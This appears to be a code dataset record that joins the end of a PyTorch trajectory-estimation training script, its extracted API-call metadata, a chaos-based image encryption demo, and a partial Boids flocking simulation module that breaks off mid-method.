train_cmd.add_argument('--continue_from', type=str, default=None)
train_cmd.add_argument('--epochs', type=int)
train_cmd.add_argument('--save_interval', type=int)
train_cmd.add_argument('--lr', '--learning_rate', type=float)
# test
test_cmd = mode.add_parser('test')
test_cmd.add_argument('--test_path', type=str, default=None)
test_cmd.add_argument('--test_list', type=str, default=None)
test_cmd.add_argument('--model_path', type=str, default='/home/SENSETIME/xurunsen/project/ronin/output/ronin_lstm/idol/2021.05.14/train_debug/checkpoints/checkpoint_714.pt')
test_cmd.add_argument('--fast_test', action='store_true')
test_cmd.add_argument('--show_plot', action='store_true')
'''
Extra arguments
Set True: use_scheduler,
quiet (no output on stdout),
force_lr (force lr when a model is loaded from continue_from)
float: dropout,
max_ori_error (err. threshold for priority grv in degrees)
max_velocity_norm (filter outliers in training)
'''
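# These extra options are not declared on the parser above; they land in `unknown_args`
# from parse_known_args() below and are merged in by load_config(),
# e.g. (illustrative values): --dropout 0.5 --max_ori_error 20.0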
args, unknown_args = parser.parse_known_args()
np.set_printoptions(formatter={'all': lambda x: '{:.6f}'.format(x)})
args, kwargs = load_config(default_config_file, args, unknown_args)
print(args, kwargs)
# added by runsen
# write list
if args.mode == "train":
if args.train_list is None:
WriteList(args.root_dir, "train_list.txt", GetFolderName(args.root_dir))
args.train_list = args.root_dir + "/train_list.txt"
if args.validation_dir is not None:
WriteList(args.validation_dir, "validation_list.txt", GetFolderName(args.validation_dir))
args.val_list = args.validation_dir + "/validation_list.txt"
elif args.mode == "test":
if args.test_list is None:
WriteList(args.root_dir, "test_list.txt", GetFolderName(args.root_dir))
args.test_list = args.root_dir + "/test_list.txt"
if args.mode == 'train':
train(args, **kwargs)
elif args.mode == 'test':
if not args.model_path:
raise ValueError("Model path required")
args.batch_size = 1
test(args, **kwargs)
|
[
"model_temporal.BilinearLSTMSeqNetwork",
"model_temporal.LSTMSeqNetwork",
"utils.MSEAverageMeter",
"numpy.array",
"torch.nn.MSELoss",
"model_temporal.TCNSeqNetwork",
"torch.cuda.is_available",
"numpy.linalg.norm",
"metric.compute_absolute_trajectory_error",
"numpy.arange",
"os.remove",
"os.path.exists",
"numpy.mean",
"os.listdir",
"argparse.ArgumentParser",
"pathlib.Path",
"torch.mean",
"matplotlib.pyplot.plot",
"torch.multiprocessing.set_sharing_strategy",
"matplotlib.pyplot.close",
"os.path.split",
"os.path.isdir",
"utils.load_config",
"numpy.concatenate",
"matplotlib.pyplot.axis",
"torch.optim.lr_scheduler.ReduceLROnPlateau",
"data_glob_speed.SequenceToSequenceDataset",
"transformations.RandomHoriRotateSeq",
"metric.compute_relative_trajectory_error",
"torch.Tensor",
"numpy.isnan",
"matplotlib.pyplot.title",
"time.time",
"torch.cumsum",
"matplotlib.pyplot.legend",
"os.path.abspath",
"matplotlib.pyplot.show",
"os.makedirs",
"transformations.ComposeTransform",
"torch.load",
"os.path.join",
"numpy.zeros",
"matplotlib.pyplot.tight_layout",
"torch.utils.data.DataLoader",
"json.load",
"numpy.cumsum",
"matplotlib.pyplot.subplot2grid",
"json.dump"
] |
[((1238, 1295), 'torch.multiprocessing.set_sharing_strategy', 'torch.multiprocessing.set_sharing_strategy', (['"""file_system"""'], {}), "('file_system')\n", (1280, 1295), False, 'import torch\n'), ((853, 875), 'os.listdir', 'os.listdir', (["(path + '/')"], {}), "(path + '/')\n", (863, 875), False, 'import os\n'), ((3270, 3298), 'transformations.ComposeTransform', 'ComposeTransform', (['transforms'], {}), '(transforms)\n', (3286, 3298), False, 'from transformations import ComposeTransform, RandomHoriRotateSeq\n'), ((3579, 3801), 'data_glob_speed.SequenceToSequenceDataset', 'SequenceToSequenceDataset', (['seq_type', 'root_dir', 'data_list', 'args.cache_path', 'args.step_size', 'args.window_size'], {'random_shift': 'random_shift', 'transform': 'transforms', 'shuffle': 'shuffle', 'grv_only': 'grv_only', 'args': 'args'}), '(seq_type, root_dir, data_list, args.cache_path,\n args.step_size, args.window_size, random_shift=random_shift, transform=\n transforms, shuffle=shuffle, grv_only=grv_only, args=args, **kwargs)\n', (3604, 3801), False, 'from data_glob_speed import GlobSpeedSequence, SequenceToSequenceDataset, SenseINSSequence\n'), ((5882, 5893), 'time.time', 'time.time', ([], {}), '()\n', (5891, 5893), False, 'import time\n'), ((6017, 6135), 'torch.utils.data.DataLoader', 'DataLoader', (['train_dataset'], {'batch_size': 'args.batch_size', 'num_workers': 'args.num_workers', 'shuffle': '(True)', 'drop_last': '(True)'}), '(train_dataset, batch_size=args.batch_size, num_workers=args.\n num_workers, shuffle=True, drop_last=True)\n', (6027, 6135), False, 'from torch.utils.data import DataLoader\n'), ((6173, 6184), 'time.time', 'time.time', ([], {}), '()\n', (6182, 6184), False, 'import time\n'), ((7596, 7686), 'torch.optim.lr_scheduler.ReduceLROnPlateau', 'ReduceLROnPlateau', (['optimizer', '"""min"""'], {'patience': '(10)', 'factor': '(0.75)', 'verbose': '(True)', 'eps': '(1e-12)'}), "(optimizer, 'min', patience=10, factor=0.75, verbose=True,\n eps=1e-12)\n", (7613, 7686), False, 'from torch.optim.lr_scheduler import ReduceLROnPlateau\n'), ((8968, 8989), 'numpy.zeros', 'np.zeros', (['args.epochs'], {}), '(args.epochs)\n', (8976, 8989), True, 'import numpy as np\n'), ((15965, 16005), 'utils.MSEAverageMeter', 'MSEAverageMeter', (['(2)', '[1]', '_output_channel'], {}), '(2, [1], _output_channel)\n', (15980, 16005), False, 'from utils import load_config, MSEAverageMeter\n'), ((19286, 19303), 'numpy.array', 'np.array', (['ate_all'], {}), '(ate_all)\n', (19294, 19303), True, 'import numpy as np\n'), ((19318, 19335), 'numpy.array', 'np.array', (['rte_all'], {}), '(rte_all)\n', (19326, 19335), True, 'import numpy as np\n'), ((19964, 20142), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Run seq2seq model in train/test mode [required]. Optional configurations can be specified as --key [value..] pairs"""', 'add_help': '(True)'}), "(description=\n 'Run seq2seq model in train/test mode [required]. Optional configurations can be specified as --key [value..] 
pairs'\n , add_help=True)\n", (19987, 20142), False, 'import argparse\n'), ((23899, 23951), 'utils.load_config', 'load_config', (['default_config_file', 'args', 'unknown_args'], {}), '(default_config_file, args, unknown_args)\n', (23910, 23951), False, 'from utils import load_config, MSEAverageMeter\n'), ((1727, 1761), 'torch.nn.MSELoss', 'torch.nn.MSELoss', ([], {'reduction': '"""none"""'}), "(reduction='none')\n", (1743, 1761), False, 'import torch\n'), ((2050, 2078), 'torch.cumsum', 'torch.cumsum', (['targ[:, 1:]', '(1)'], {}), '(targ[:, 1:], 1)\n', (2062, 2078), False, 'import torch\n'), ((2100, 2128), 'torch.cumsum', 'torch.cumsum', (['pred[:, 1:]', '(1)'], {}), '(pred[:, 1:], 1)\n', (2112, 2128), False, 'import torch\n'), ((2391, 2407), 'torch.mean', 'torch.mean', (['loss'], {}), '(loss)\n', (2401, 2407), False, 'import torch\n'), ((4324, 4432), 'model_temporal.TCNSeqNetwork', 'TCNSeqNetwork', (['_input_channel', '_output_channel', 'args.kernel_size'], {'layer_channels': 'args.channels'}), '(_input_channel, _output_channel, args.kernel_size,\n layer_channels=args.channels, **config)\n', (4337, 4432), False, 'from model_temporal import LSTMSeqNetwork, BilinearLSTMSeqNetwork, TCNSeqNetwork\n'), ((6468, 6554), 'torch.utils.data.DataLoader', 'DataLoader', (['val_dataset'], {'batch_size': 'args.batch_size', 'shuffle': '(True)', 'drop_last': '(True)'}), '(val_dataset, batch_size=args.batch_size, shuffle=True, drop_last\n =True)\n', (6478, 6554), False, 'from torch.utils.data import DataLoader\n'), ((7843, 7884), 'os.path.join', 'osp.join', (['args.out_dir', '"""logs"""', '"""log.txt"""'], {}), "(args.out_dir, 'logs', 'log.txt')\n", (7851, 7884), True, 'from os import path as osp\n'), ((7896, 7916), 'os.path.exists', 'osp.exists', (['log_file'], {}), '(log_file)\n', (7906, 7916), True, 'from os import path as osp\n'), ((8160, 8190), 'os.path.exists', 'osp.exists', (['args.continue_from'], {}), '(args.continue_from)\n', (8170, 8190), True, 'from os import path as osp\n'), ((13126, 13187), 'os.path.join', 'osp.join', (['args.out_dir', '"""checkpoints"""', '"""checkpoint_latest.pt"""'], {}), "(args.out_dir, 'checkpoints', 'checkpoint_latest.pt')\n", (13134, 13187), True, 'from os import path as osp\n'), ((13501, 13576), 'numpy.array', 'np.array', (['[i[1] for i in dataset.index_map if i[0] == seq_id]'], {'dtype': 'np.int'}), '([i[1] for i in dataset.index_map if i[0] == seq_id], dtype=np.int)\n', (13509, 13576), True, 'import numpy as np\n'), ((13804, 13839), 'numpy.mean', 'np.mean', (['(ts[ind[1:]] - ts[ind[:-1]])'], {}), '(ts[ind[1:]] - ts[ind[:-1]])\n', (13811, 13839), True, 'import numpy as np\n'), ((13982, 14004), 'numpy.cumsum', 'np.cumsum', (['pos'], {'axis': '(0)'}), '(pos, axis=0)\n', (13991, 14004), True, 'import numpy as np\n'), ((15052, 15077), 'os.makedirs', 'os.makedirs', (['args.out_dir'], {}), '(args.out_dir)\n', (15063, 15077), False, 'import os\n'), ((15189, 15201), 'json.load', 'json.load', (['f'], {}), '(f)\n', (15198, 15201), False, 'import json\n'), ((15253, 15328), 'torch.load', 'torch.load', (['args.model_path'], {'map_location': '(lambda storage, location: storage)'}), '(args.model_path, map_location=lambda storage, location: storage)\n', (15263, 15328), False, 'import torch\n'), ((15360, 15437), 'torch.load', 'torch.load', (['args.model_path'], {'map_location': "{model_data['device']: args.device}"}), "(args.model_path, map_location={model_data['device']: args.device})\n", (15370, 15437), False, 'import torch\n'), ((16473, 16496), 'numpy.arange', 'np.arange', 
(['vel.shape[0]'], {}), '(vel.shape[0])\n', (16482, 16496), True, 'import numpy as np\n'), ((16518, 16553), 'numpy.mean', 'np.mean', (['((vel - preds) ** 2)'], {'axis': '(0)'}), '((vel - preds) ** 2, axis=0)\n', (16525, 16553), True, 'import numpy as np\n'), ((17079, 17130), 'metric.compute_absolute_trajectory_error', 'compute_absolute_trajectory_error', (['pos_pred', 'pos_gt'], {}), '(pos_pred, pos_gt)\n', (17112, 17130), False, 'from metric import compute_absolute_trajectory_error, compute_relative_trajectory_error\n'), ((17464, 17505), 'numpy.linalg.norm', 'np.linalg.norm', (['(pos_pred - pos_gt)'], {'axis': '(1)'}), '(pos_pred - pos_gt, axis=1)\n', (17478, 17505), True, 'import numpy as np\n'), ((19254, 19270), 'matplotlib.pyplot.close', 'plt.close', (['"""all"""'], {}), "('all')\n", (19263, 19270), True, 'import matplotlib.pyplot as plt\n'), ((19416, 19432), 'numpy.mean', 'np.mean', (['ate_all'], {}), '(ate_all)\n', (19423, 19432), True, 'import numpy as np\n'), ((19434, 19450), 'numpy.mean', 'np.mean', (['rte_all'], {}), '(rte_all)\n', (19441, 19450), True, 'import numpy as np\n'), ((2697, 2733), 'json.dump', 'json.dump', (['values', 'f'], {'sort_keys': '(True)'}), '(values, f, sort_keys=True)\n', (2706, 2733), False, 'import json\n'), ((3083, 3131), 'transformations.RandomHoriRotateSeq', 'RandomHoriRotateSeq', (['input_format', 'output_format'], {}), '(input_format, output_format)\n', (3102, 3131), False, 'from transformations import ComposeTransform, RandomHoriRotateSeq\n'), ((6649, 6674), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (6672, 6674), False, 'import torch\n'), ((6724, 6747), 'os.path.isdir', 'osp.isdir', (['args.out_dir'], {}), '(args.out_dir)\n', (6733, 6747), True, 'from os import path as osp\n'), ((6761, 6786), 'os.makedirs', 'os.makedirs', (['args.out_dir'], {}), '(args.out_dir)\n', (6772, 6786), False, 'import os\n'), ((8313, 8325), 'json.load', 'json.load', (['f'], {}), '(f)\n', (8322, 8325), False, 'import json\n'), ((8386, 8464), 'torch.load', 'torch.load', (['args.continue_from'], {'map_location': '(lambda storage, location: storage)'}), '(args.continue_from, map_location=lambda storage, location: storage)\n', (8396, 8464), False, 'import torch\n'), ((8505, 8590), 'torch.load', 'torch.load', (['args.continue_from'], {'map_location': "{model_data['device']: args.device}"}), "(args.continue_from, map_location={model_data['device']: args.device}\n )\n", (8515, 8590), False, 'import torch\n'), ((9231, 9271), 'utils.MSEAverageMeter', 'MSEAverageMeter', (['(3)', '[2]', '_output_channel'], {}), '(3, [2], _output_channel)\n', (9246, 9271), False, 'from utils import load_config, MSEAverageMeter\n'), ((9321, 9332), 'time.time', 'time.time', ([], {}), '()\n', (9330, 9332), False, 'import time\n'), ((9955, 9966), 'time.time', 'time.time', ([], {}), '()\n', (9964, 9966), False, 'import time\n'), ((12861, 12881), 'numpy.isnan', 'np.isnan', (['train_loss'], {}), '(train_loss)\n', (12869, 12881), True, 'import numpy as np\n'), ((14231, 14256), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (14254, 14256), False, 'import torch\n'), ((14411, 14436), 'os.path.split', 'osp.split', (['args.test_path'], {}), '(args.test_path)\n', (14420, 14436), True, 'from os import path as osp\n'), ((15018, 15042), 'os.path.exists', 'osp.exists', (['args.out_dir'], {}), '(args.out_dir)\n', (15028, 15042), True, 'from os import path as osp\n'), ((16894, 16917), 'os.path.isdir', 'osp.isdir', (['args.out_dir'], {}), '(args.out_dir)\n', (16903, 
16917), True, 'from os import path as osp\n'), ((17368, 17439), 'metric.compute_relative_trajectory_error', 'compute_relative_trajectory_error', (['pos_pred', 'pos_gt'], {'delta': 'pred_per_min'}), '(pos_pred, pos_gt, delta=pred_per_min)\n', (17401, 17439), False, 'from metric import compute_absolute_trajectory_error, compute_relative_trajectory_error\n'), ((17802, 17821), 'numpy.mean', 'np.mean', (['val_losses'], {}), '(val_losses)\n', (17809, 17821), True, 'import numpy as np\n'), ((18109, 18158), 'matplotlib.pyplot.subplot2grid', 'plt.subplot2grid', (['(kp, 2)', '(0, 0)'], {'rowspan': '(kp - 1)'}), '((kp, 2), (0, 0), rowspan=kp - 1)\n', (18125, 18158), True, 'import matplotlib.pyplot as plt\n'), ((18171, 18211), 'matplotlib.pyplot.plot', 'plt.plot', (['pos_pred[:, 0]', 'pos_pred[:, 1]'], {}), '(pos_pred[:, 0], pos_pred[:, 1])\n', (18179, 18211), True, 'import matplotlib.pyplot as plt\n'), ((18224, 18260), 'matplotlib.pyplot.plot', 'plt.plot', (['pos_gt[:, 0]', 'pos_gt[:, 1]'], {}), '(pos_gt[:, 0], pos_gt[:, 1])\n', (18232, 18260), True, 'import matplotlib.pyplot as plt\n'), ((18273, 18288), 'matplotlib.pyplot.title', 'plt.title', (['data'], {}), '(data)\n', (18282, 18288), True, 'import matplotlib.pyplot as plt\n'), ((18301, 18318), 'matplotlib.pyplot.axis', 'plt.axis', (['"""equal"""'], {}), "('equal')\n", (18309, 18318), True, 'import matplotlib.pyplot as plt\n'), ((18331, 18372), 'matplotlib.pyplot.legend', 'plt.legend', (["['Predicted', 'Ground truth']"], {}), "(['Predicted', 'Ground truth'])\n", (18341, 18372), True, 'import matplotlib.pyplot as plt\n'), ((18385, 18423), 'matplotlib.pyplot.subplot2grid', 'plt.subplot2grid', (['(kp, 2)', '(kp - 1, 0)'], {}), '((kp, 2), (kp - 1, 0))\n', (18401, 18423), True, 'import matplotlib.pyplot as plt\n'), ((18436, 18459), 'matplotlib.pyplot.plot', 'plt.plot', (['pos_cum_error'], {}), '(pos_cum_error)\n', (18444, 18459), True, 'import matplotlib.pyplot as plt\n'), ((18864, 18882), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (18880, 18882), True, 'import matplotlib.pyplot as plt\n'), ((19860, 19881), 'os.path.abspath', 'osp.abspath', (['__file__'], {}), '(__file__)\n', (19871, 19881), True, 'from os import path as osp\n'), ((950, 971), 'os.path.abspath', 'os.path.abspath', (['path'], {}), '(path)\n', (965, 971), False, 'import os\n'), ((2483, 2520), 'os.path.join', 'osp.join', (['args.out_dir', '"""config.json"""'], {}), "(args.out_dir, 'config.json')\n", (2491, 2520), True, 'from os import path as osp\n'), ((6812, 6849), 'os.path.join', 'osp.join', (['args.out_dir', '"""checkpoints"""'], {}), "(args.out_dir, 'checkpoints')\n", (6820, 6849), True, 'from os import path as osp\n'), ((6876, 6913), 'os.path.join', 'osp.join', (['args.out_dir', '"""checkpoints"""'], {}), "(args.out_dir, 'checkpoints')\n", (6884, 6913), True, 'from os import path as osp\n'), ((6940, 6970), 'os.path.join', 'osp.join', (['args.out_dir', '"""logs"""'], {}), "(args.out_dir, 'logs')\n", (6948, 6970), True, 'from os import path as osp\n'), ((6997, 7027), 'os.path.join', 'osp.join', (['args.out_dir', '"""logs"""'], {}), "(args.out_dir, 'logs')\n", (7005, 7027), True, 'from os import path as osp\n'), ((7977, 7996), 'os.remove', 'os.remove', (['log_file'], {}), '(log_file)\n', (7986, 7996), False, 'import os\n'), ((10611, 10651), 'utils.MSEAverageMeter', 'MSEAverageMeter', (['(3)', '[2]', '_output_channel'], {}), '(3, [2], _output_channel)\n', (10626, 10651), False, 'from utils import load_config, MSEAverageMeter\n'), ((12324, 12390), 
'os.path.join', 'osp.join', (['args.out_dir', '"""checkpoints"""', "('icheckpoint_%d.pt' % epoch)"], {}), "(args.out_dir, 'checkpoints', 'icheckpoint_%d.pt' % epoch)\n", (12332, 12390), True, 'from os import path as osp\n'), ((14466, 14491), 'os.path.split', 'osp.split', (['args.test_path'], {}), '(args.test_path)\n', (14475, 14491), True, 'from os import path as osp\n'), ((16222, 16259), 'os.path.split', 'osp.split', (['seq_dataset.data_path[idx]'], {}), '(seq_dataset.data_path[idx])\n', (16231, 16259), True, 'from os import path as osp\n'), ((16329, 16347), 'torch.Tensor', 'torch.Tensor', (['feat'], {}), '(feat)\n', (16341, 16347), False, 'import torch\n'), ((17020, 17062), 'numpy.concatenate', 'np.concatenate', (['[pos_pred, pos_gt]'], {'axis': '(1)'}), '([pos_pred, pos_gt], axis=1)\n', (17034, 17062), True, 'import numpy as np\n'), ((17247, 17332), 'metric.compute_relative_trajectory_error', 'compute_relative_trajectory_error', (['pos_pred', 'pos_gt'], {'delta': '(pos_pred.shape[0] - 1)'}), '(pos_pred, pos_gt, delta=pos_pred.shape[0] - 1\n )\n', (17280, 17332), False, 'from metric import compute_absolute_trajectory_error, compute_relative_trajectory_error\n'), ((17656, 17675), 'numpy.mean', 'np.mean', (['val_losses'], {}), '(val_losses)\n', (17663, 17675), True, 'import numpy as np\n'), ((18592, 18625), 'matplotlib.pyplot.subplot2grid', 'plt.subplot2grid', (['(kp, 2)', '(i, 1)'], {}), '((kp, 2), (i, 1))\n', (18608, 18625), True, 'import matplotlib.pyplot as plt\n'), ((18642, 18668), 'matplotlib.pyplot.plot', 'plt.plot', (['ind', 'preds[:, i]'], {}), '(ind, preds[:, i])\n', (18650, 18668), True, 'import matplotlib.pyplot as plt\n'), ((18685, 18709), 'matplotlib.pyplot.plot', 'plt.plot', (['ind', 'vel[:, i]'], {}), '(ind, vel[:, i])\n', (18693, 18709), True, 'import matplotlib.pyplot as plt\n'), ((18726, 18767), 'matplotlib.pyplot.legend', 'plt.legend', (["['Predicted', 'Ground truth']"], {}), "(['Predicted', 'Ground truth'])\n", (18736, 18767), True, 'import matplotlib.pyplot as plt\n'), ((18931, 18941), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (18939, 18941), True, 'import matplotlib.pyplot as plt\n'), ((18987, 19010), 'os.path.isdir', 'osp.isdir', (['args.out_dir'], {}), '(args.out_dir)\n', (18996, 19010), True, 'from os import path as osp\n'), ((4640, 4786), 'model_temporal.BilinearLSTMSeqNetwork', 'BilinearLSTMSeqNetwork', (['_input_channel', '_output_channel', 'args.batch_size', 'device'], {'lstm_layers': 'args.layers', 'lstm_size': 'args.layer_size'}), '(_input_channel, _output_channel, args.batch_size,\n device, lstm_layers=args.layers, lstm_size=args.layer_size, **config)\n', (4662, 4786), False, 'from model_temporal import LSTMSeqNetwork, BilinearLSTMSeqNetwork, TCNSeqNetwork\n'), ((4900, 5038), 'model_temporal.LSTMSeqNetwork', 'LSTMSeqNetwork', (['_input_channel', '_output_channel', 'args.batch_size', 'device'], {'lstm_layers': 'args.layers', 'lstm_size': 'args.layer_size'}), '(_input_channel, _output_channel, args.batch_size, device,\n lstm_layers=args.layers, lstm_size=args.layer_size, **config)\n', (4914, 5038), False, 'from model_temporal import LSTMSeqNetwork, BilinearLSTMSeqNetwork, TCNSeqNetwork\n'), ((8050, 8095), 'os.path.join', 'osp.join', (['args.out_dir', '"""logs"""', '"""log_old.txt"""'], {}), "(args.out_dir, 'logs', 'log_old.txt')\n", (8058, 8095), True, 'from os import path as osp\n'), ((14588, 14613), 'os.path.split', 'osp.split', (['args.test_list'], {}), '(args.test_list)\n', (14597, 14613), True, 'from os import path as osp\n'), ((11700, 
11765), 'os.path.join', 'osp.join', (['args.out_dir', '"""checkpoints"""', "('checkpoint_%d.pt' % epoch)"], {}), "(args.out_dir, 'checkpoints', 'checkpoint_%d.pt' % epoch)\n", (11708, 11765), True, 'from os import path as osp\n'), ((15106, 15127), 'pathlib.Path', 'Path', (['args.model_path'], {}), '(args.model_path)\n', (15110, 15127), False, 'from pathlib import Path\n'), ((8223, 8247), 'pathlib.Path', 'Path', (['args.continue_from'], {}), '(args.continue_from)\n', (8227, 8247), False, 'from pathlib import Path\n'), ((15751, 15776), 'os.path.split', 'osp.split', (['args.test_list'], {}), '(args.test_list)\n', (15760, 15776), True, 'from os import path as osp\n')]
|
from scipy.misc import imread,imshow
import chaosencrypt as cenc
import numpy as np
from chaosencrypt.discrete_pisarchik import bitexpand,bitreduce
# Read image
print('Loading image...')
im_org = imread('../image.jpg')
# Downsample
im = im_org[::3,::3,:].copy()
# Key
key = {'a':3.8,'n':10,'r':3,'bits':32}
# Encrypt
print('Encrypting image (discrete pisarchik)...')
enc_im = cenc.encrypt(im,key,'discrete_pisarchik')
# Decrypt
print('Decrypting image (discrete pisarchik)...')
dec_im = cenc.decrypt(enc_im,key,'discrete_pisarchik')
# Diff
diff = np.array(np.abs((im*1.0) - (dec_im*1.0)), dtype='int')
maxdiff = np.max(diff)
print('Max diff:', maxdiff)
# Show
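# Rescale the absolute difference to the 0-255 uint8 range for display
# (an all-zero image means decryption was exact).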
if maxdiff == 0:
    diff_im = np.zeros(im.shape, dtype='uint8')
else:
    diff_im = np.array((diff - np.min(diff)) / (np.max(diff) - np.min(diff)) * 255.99, dtype='uint8')
print('[ original | encrypted ]')
print('[ decrypted | abs(org-dec) ]')
imshow(np.concatenate(
    [np.concatenate((im, bitreduce(enc_im)), 1),
     np.concatenate((dec_im, diff_im), 1)],
    0))
|
[
"numpy.abs",
"chaosencrypt.encrypt",
"chaosencrypt.discrete_pisarchik.bitreduce",
"numpy.max",
"scipy.misc.imread",
"numpy.zeros",
"numpy.concatenate",
"numpy.min",
"chaosencrypt.decrypt"
] |
[((198, 220), 'scipy.misc.imread', 'imread', (['"""../image.jpg"""'], {}), "('../image.jpg')\n", (204, 220), False, 'from scipy.misc import imread, imshow\n'), ((381, 424), 'chaosencrypt.encrypt', 'cenc.encrypt', (['im', 'key', '"""discrete_pisarchik"""'], {}), "(im, key, 'discrete_pisarchik')\n", (393, 424), True, 'import chaosencrypt as cenc\n'), ((493, 540), 'chaosencrypt.decrypt', 'cenc.decrypt', (['enc_im', 'key', '"""discrete_pisarchik"""'], {}), "(enc_im, key, 'discrete_pisarchik')\n", (505, 540), True, 'import chaosencrypt as cenc\n'), ((619, 631), 'numpy.max', 'np.max', (['diff'], {}), '(diff)\n', (625, 631), True, 'import numpy as np\n'), ((563, 594), 'numpy.abs', 'np.abs', (['(im * 1.0 - dec_im * 1.0)'], {}), '(im * 1.0 - dec_im * 1.0)\n', (569, 594), True, 'import numpy as np\n'), ((696, 729), 'numpy.zeros', 'np.zeros', (['im.shape'], {'dtype': '"""uint8"""'}), "(im.shape, dtype='uint8')\n", (704, 729), True, 'import numpy as np\n'), ((979, 1015), 'numpy.concatenate', 'np.concatenate', (['(dec_im, diff_im)', '(1)'], {}), '((dec_im, diff_im), 1)\n', (993, 1015), True, 'import numpy as np\n'), ((764, 776), 'numpy.min', 'np.min', (['diff'], {}), '(diff)\n', (770, 776), True, 'import numpy as np\n'), ((781, 793), 'numpy.max', 'np.max', (['diff'], {}), '(diff)\n', (787, 793), True, 'import numpy as np\n'), ((796, 808), 'numpy.min', 'np.min', (['diff'], {}), '(diff)\n', (802, 808), True, 'import numpy as np\n'), ((954, 971), 'chaosencrypt.discrete_pisarchik.bitreduce', 'bitreduce', (['enc_im'], {}), '(enc_im)\n', (963, 971), False, 'from chaosencrypt.discrete_pisarchik import bitexpand, bitreduce\n')]
|
"""
This script contains the code implementing my version of the Boids artificial
life programme.
"""
# ---------------------------------- Imports ----------------------------------
# Allow imports from parent folder
import sys, os
sys.path.insert(0, os.path.abspath('..'))
# Standard library imports
import timeit
import time
import numpy as np
from math import atan2, sqrt
# Repo module imports
import boids_core.generate_values as generate_values
# Code from delauney triangulation module
from delauney_triangulation.triangulation_core.triangulation import triangulate
from delauney_triangulation.triangulation_core.linear_algebra import (vector_add,
vector_sub,
list_divide,
perpendicular,
normalise)
# ----------------------------- Class definitions -----------------------------
class World():
"""
A 2D world for the Boids to live in.
"""
def __init__(self, world_size):
self.x_min = world_size[0]
self.x_max = world_size[1]
self.y_min = world_size[2]
self.y_max = world_size[3]
class Object():
def __init__(self, idx, position, stationary=False):
self.index = idx
self.stationary = stationary
self.pos = position
class Obstacle(Object):
def __init__(self, idx, position):
super().__init__(idx, position, stationary=True)
class Boid(Object):
"""
Class to represent a single Boid.
"""
def __init__(self, idx, position, velocity, options):
super().__init__(idx, position)
self.vel = velocity
self.neighbours = []
self.max_speed = options['max_speed']
self.field_of_view = options['field_of_view']
self.vision_distance = options['vision_distance']
self.safety_zone = options['safety_zone']
self.alignment_perception = options['alignment_perception']
self.cohesion_perception = options['cohesion_perception']
self.separation_perception = options['seperation_perception']
def __repr__(self):
return f"{self.index}, {self.pos}, {self.vel}"
def magnitude(self):
return sqrt(self.vel[0]**2 + self.vel[1]**2)
def direction(self):
return atan2(self.vel[1], self.vel[0])
def make_tri(self, height, width):
"""
Generate the co-ordinates of the three points of a triangle used to
plot the boid.
Parameters
----------
height : int
The height of the boid in pixels.
width : int
The width of the boid in pixels.
Returns
-------
numpy.array
Numpy array with the triangle coordinates.
"""
offset_h = list_divide(self.vel, self.magnitude()/height)
offset_w = list_divide(self.vel, self.magnitude()/width)
offset_w = perpendicular(offset_w)
p1 = vector_add(self.pos, list_divide(offset_h, 2))
p2 = p3 = vector_sub(self.pos, list_divide(offset_h, 2))
p2 = vector_add(p2, list_divide(offset_w, 2))
p3 = vector_sub(p3, list_divide(offset_w, 2))
return (np.asarray([p1, p2, p3]).astype(int))
def restrict_fov(self, positions):
"""
Function to limit the field of view of the boid. Neighbours beyond the
self.field_of_view/2 angle are removed from the set of neighbours.
Parameters
----------
positions : list
List of all coordinates of the boids.
"""
new_neighbours = []
boid_dir = atan2(self.vel[0], self.vel[1])
for neighbour in self.neighbours:
n_pos = positions[neighbour[1]]
# Find the angle between boid direction and neighbour
angle = atan2(n_pos[0]-self.pos[0], n_pos[1]-self.pos[1])
# print(f"{boid_dir},{boid_dir - self.field_of_view/2},{angle},{boid_dir + self.field_of_view/2}")
if ((boid_dir - self.field_of_view/2) < angle and
angle < (boid_dir + self.field_of_view/2)):
diff_x = n_pos[0] - self.pos[0]
diff_y = n_pos[1] - self.pos[1]
distance = sqrt(diff_x**2 + diff_y**2)
if distance < self.vision_distance:
new_neighbours.append(neighbour)
self.neighbours = new_neighbours
def separation(self, positions):
"""
Function to implement the boids separation rule.
"""
resultant_x = 0
resultant_y = 0
counter = 0
for neighbour in self.neighbours:
n_pos = positions[neighbour[1]]
diff_x = n_pos[0] - self.pos[0]
diff_y = n_pos[1] - self.pos[1]
distance = sqrt(diff_x**2 + diff_y**2)
if distance < self.safety_zone:
counter += 1
resultant_x -= diff_x / distance
resultant_y -= diff_y / distance
if counter != 0:
resultant_x /= counter
resultant_y /= counter
vs_x = self.separation_perception * resultant_x
vs_y = self.separation_perception * resultant_y
# print(f"separation,{vs_x:0.4f},{vs_y:0.4f}")
return [vs_x, vs_y]
def cohesion(self, positions):
"""
Function to implement the boids cohesion rule.
"""
num_neighbours = len(self.neighbours)
resultant_x = 0
resultant_y = 0
for neighbour in self.neighbours:
n_pos = positions[neighbour[1]]
resultant_x += n_pos[0]
resultant_y += n_pos[1]
resultant_x /= num_neighbours
resultant_y /= num_neighbours
vc_x = self.cohesion_perception * (resultant_x - self.pos[0])
vc_y = self.cohesion_perception * (resultant_y - self.pos[1])
# print(f"cohesion,{vc_x:0.4f},{vc_y:0.4f}")
return [vc_x, vc_y]
def alignment(self, velocities):
"""
Function to implement the boids alignment rule.
"""
num_neighbours = len(self.neighbours)
resultant_vx = 0
resultant_vy = 0
for neighbour in self.neighbours:
n_velo = velocities[neighbour[1]]
resultant_vx += n_velo[0]
resultant_vy += n_velo[1]
resultant_vx /= num_neighbours
resultant_vy /= num_neighbours
va_x = self.alignment_perception * resultant_vx
va_y = self.alignment_perception * resultant_vy
# print(f"alignment,{va_x:0.4f},{va_y:0.4f}")
return [va_x, va_y]
def wrap_world(self, world):
"""
Apply periodic boundary conditions, so that if a boid goes off the edge
of the world it reappears on the opposite edge.
"""
if self.pos[0] < 0:
self.pos[0] = world.x_max + self.pos[0]
if self.pos[0] > world.x_max:
self.pos[0] = self.pos[0] - world.x_max
if self.pos[1] < 0:
self.pos[1] = world.y_max + self.pos[1]
if self.pos[1] > world.y_max:
self.pos[1] = self.pos[1] - world.y_max
def update_boid(self, positions, velocities, world):
"""
Function to apply all the boid rules to update the position and
velocity of a boid for a single time-step.
"""
self.restrict_fov(positions)
